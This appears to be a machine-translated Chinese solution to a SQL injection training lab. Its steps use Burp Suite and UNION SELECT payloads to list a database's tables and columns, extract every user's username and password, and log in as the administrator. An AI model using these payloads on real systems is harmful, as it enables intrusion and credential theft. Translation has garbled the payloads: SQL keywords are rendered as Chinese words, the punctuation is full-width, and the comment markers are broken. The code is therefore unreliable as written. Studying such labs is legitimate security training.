实验室：SQL注入攻击，在非Oracle数据库上列出数据库内容

1. 使用Burp Suite拦截和修改设置产品类别过滤器的请求。

2. 确定查询返回的列数和哪些列包含文本数据。验证查询是否正在返回两列，两列都包含文本，使用有效载荷如下类别范围：

   '+联合+选择+'abc'，'def' -

3. 使用以下有效负载检索数据库中的表列表：

   '+联合+选择+table_name，+null+来自+Information_schema.tables--
4. 查找包含用户凭据的表的名称。

5. 使用以下有效载荷（替换表名称）来检索表中列的详细信息：

   '+Union+select+column_name，+null+来自+Information_schema.columns+where+table_name ='users_abcdef' -
6. 查找包含用户名和密码的列的名称。

7. 使用以下有效负载（替换表和列名）为所有用户检索用户名和密码：

   '+Union+选择+username_abcdef，+password_abcdef+来自+users_abcdef--
8. 查找密码行政人员用户，并使用它登录。

intigriti

拉娜·哈利尔（Rana Khalil）

迈克尔·索默（Michael Sommer）